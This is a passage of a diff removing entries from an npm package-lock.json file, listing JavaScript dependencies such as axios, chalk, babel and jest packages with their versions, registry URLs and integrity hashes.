"https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.2.tgz", - "integrity": "sha512-P43ePfOAIupkguHUycrc4qJ9kz8ZiuOUijaETwX7THt0Y/GNK7v0aa8rY816xWjZ7rJdA5XdMcpVFTKMq+RvWg==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asap": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", - "integrity": "sha1-5QNHYR1+aQlDIIu9r+vLwvuGbUY=" - }, - "asn1": { - "version": "0.2.4", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.4.tgz", - "integrity": "sha512-jxwzQpLQjSmWXgwaCZE9Nz+glAG01yF1QnWgbhGwHI5A6FRIEY6IVqtHhIepHqI7/kyEyQEagBC5mBEFlIYvdg==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "axios": { - "version": "1.6.0", - "resolved": "https://registry.npmjs.org/axios/-/axios-1.6.0.tgz", - "integrity": "sha512-EZ1DYihju9pwVB+jg67ogm+Tmqc6JmhamRN6I4Zt8DfZu5lbcQGw3ozH9lFejSJgs/ibaef3A9PMXPLeefFGJg==", - "requires": { - "follow-redirects": "^1.15.0", - "form-data": "^4.0.0", - "proxy-from-env": "^1.1.0" - }, - "dependencies": { - "form-data": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.0.tgz", - "integrity": "sha512-ETEklSGi5t0QMZuiXoA/Q6vcnxcLQP5vdugSpuAyi6SVGi2clPPp+xgEhuMaHC+zGgn31Kd235W35f7Hykkaww==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.8", - "mime-types": "^2.1.12" - } - } - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.16.7", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.16.7.tgz", - "integrity": "sha512-7I4qVwqZltJ7j37wObBe3SoTz+nS8APaNcrBOlgoirb6/HbEU2XxW/LpUDTCngM6iauwFqmRTuOMfyKnFGY5JA==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001248", - "colorette": "^1.2.2", - "electron-to-chromium": "^1.3.793", - "escalade": "^3.1.1", - "node-releases": "^1.1.73" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001251", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001251.tgz", - "integrity": "sha512-HOe1r+9VkU4TFmnU70z+r7OLmtR+/chB1rdcJUeQlAinjEeb0cKL20tlAtOagNZhbrtLnCvV19B4FmF1rgzl6A==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==" - }, - "ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.2.2", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.2.tgz", - "integrity": "sha512-cOU9usZw8/dXIXKtwa8pM0OTJQuJkxMN6w30csNRUerHfeQ5R6U3kkU/FtJeIf3M202OHfY2U8ccInBG7/xogA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.1.tgz", - "integrity": "sha512-iBPtljfCNcTKNAto0KEtDfZ3qzjJvqE3aTGZsbhjSBlorqpXJlaWWtPO35D+ZImoC3KWejX64o+yPGxhWSTzfg==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "colorette": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/colorette/-/colorette-1.3.0.tgz", - "integrity": "sha512-ecORCqbSFP7Wm8Y6lyqMJjexBQqXSF7SSeaTyGGphogUjBlFP9m9o08wy86HL2uB7fMTxtOUzLMk7ogKcxMg1w==", - "dev": true - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "commander": { - "version": "5.1.0", - "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", - "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==" - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" - }, - "convert-source-map": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", - "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", - "dev": true, - "requires": { - "safe-buffer": "~5.1.1" - } - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "cross-spawn": { - "version": "7.0.3", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.3.tgz", - "integrity": "sha512-iRDPJKUPVEND7dHPO8rkbOnPpyDygcDFtWjpeWNCgy8WP2rXcxXL8TskReQl6OrB2G7+UJrags1q15Fudc7G6w==", - "dev": true, - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-0.7.0.tgz", - "integrity": "sha512-Q6fKUPqnAHAyhiUgFU7BUzLiv0kd8saH9al7tnu5Q/okj6dnupxyTgFIBjVzJATdfIAm9NAsvXNzjaKa+bxVyA==", - "dev": true - }, - "deepmerge": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.0.tgz", - "integrity": "sha512-z2wJZXrmeHdvYJp/Ux55wIjqo81G5Bp4c+oELTW+7ar6SogWHajt5a9gO3s3IDaGSAXjDk0vlQKN3rms8ab3og==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "electron-to-chromium": { - "version": "1.3.803", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.3.803.tgz", - "integrity": "sha512-tmRK9qB8Zs8eLMtTBp+w2zVS9MUe62gQQQHjYdAc5Zljam3ZIokNb+vZLPRz9RCREp6EFRwyhOFwbt1fEriQ2Q==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "requires": { - "is-arrayish": "^0.2.1" - } - }, - "escalade": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.1.tgz", - "integrity": "sha512-k0er2gUkLf8O0zKJiAhmkTnJlTvINGv7ygDNPbeIsX/TJjGJZHuh9B2UxbsaEkmlEo9MfhrSzmhIlhRlI2GXnw==", - "dev": true - }, - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - }, - "esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true - }, - "execa": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.0.0.tgz", - "integrity": "sha512-ov6w/2LCiuyO4RLYGdpFGjkcs0wMTgGE8PrkTHikeUy5iJekXyPIKUjifk5CsE0pt7sMCrMZ3YNqoCj6idQOnQ==", - "dev": true, - "requires": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - } - }, - "exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true - }, - "expect": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.4.1.tgz", - "integrity": "sha512-OKrGESHOaMxK3b6zxIq9SOW8kEXztKff/Dvg88j4xIJxur1hspEbedVkR3GpHe5LO+WB2Qw7OWN0RMTdp6as5A==", - "dev": true, - "requires": { - "@jest/expect-utils": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=" - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" - }, - "fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" - }, - "fb-watchman": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.1.tgz", - "integrity": "sha512-DkPJKQeY6kKwmuMretBhr7G6Vodr7bFwDYTXIkfG1gjvNpaxBTQV3PbXg6bR1c1UP4jPOX0jHUbbHANL9vRjVg==", - "dev": true, - "requires": { - "bser": "2.1.1" - } - }, - "fill-range": { - "version": "7.1.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", - "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", - "dev": true, - "requires": { - "to-regex-range": "^5.0.1" - } - }, - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "follow-redirects": { - "version": "1.15.6", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.15.6.tgz", - "integrity": "sha512-wWN62YITEaOpSK584EZXJafH1AGpO8RVgElfkuXbTOrPX4fIfOyEpW/CsiNd8JdYrAoOvafRTOEnvsO++qCqFA==" - }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=" - }, - "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "requires": { - "minipass": "^3.0.0" - } - }, - "fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=" - }, - "fsevents": { - "version": "2.3.2", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.2.tgz", - "integrity": "sha512-xiqMQR4xAeHTuB9uWm+fFRcIOgKBMiOBP+eXiyT7jsgVCq1bkVygt00oASowB7EdtpOHaaPgKt812P9ab+DDKA==", - "dev": true, - "optional": true - }, - "function-bind": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.1.tgz", - "integrity": "sha512-yIovAzMX49sF8Yl58fSCWJ5svSLuaibPxXQJFLmBObTuCr0Mf1KiPopGM9NiFjiYBCbfaa2Fh6breQ6ANVTI0A==", - "dev": true - }, - "gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true - }, - "get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true - }, - "get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true - }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "requires": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - } - }, - "globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true - }, - "graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=" - }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - } - }, - "has": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", - "integrity": "sha512-f2dvO0VU6Oej7RkWJGrehjbzMAjFp5/VKPp5tTpWIV4JHHZK1/BxbFRtf/siA2SWTe09caDmVtYYzWEIbBS4zw==", - "dev": true, - "requires": { - "function-bind": "^1.1.1" - } - }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": 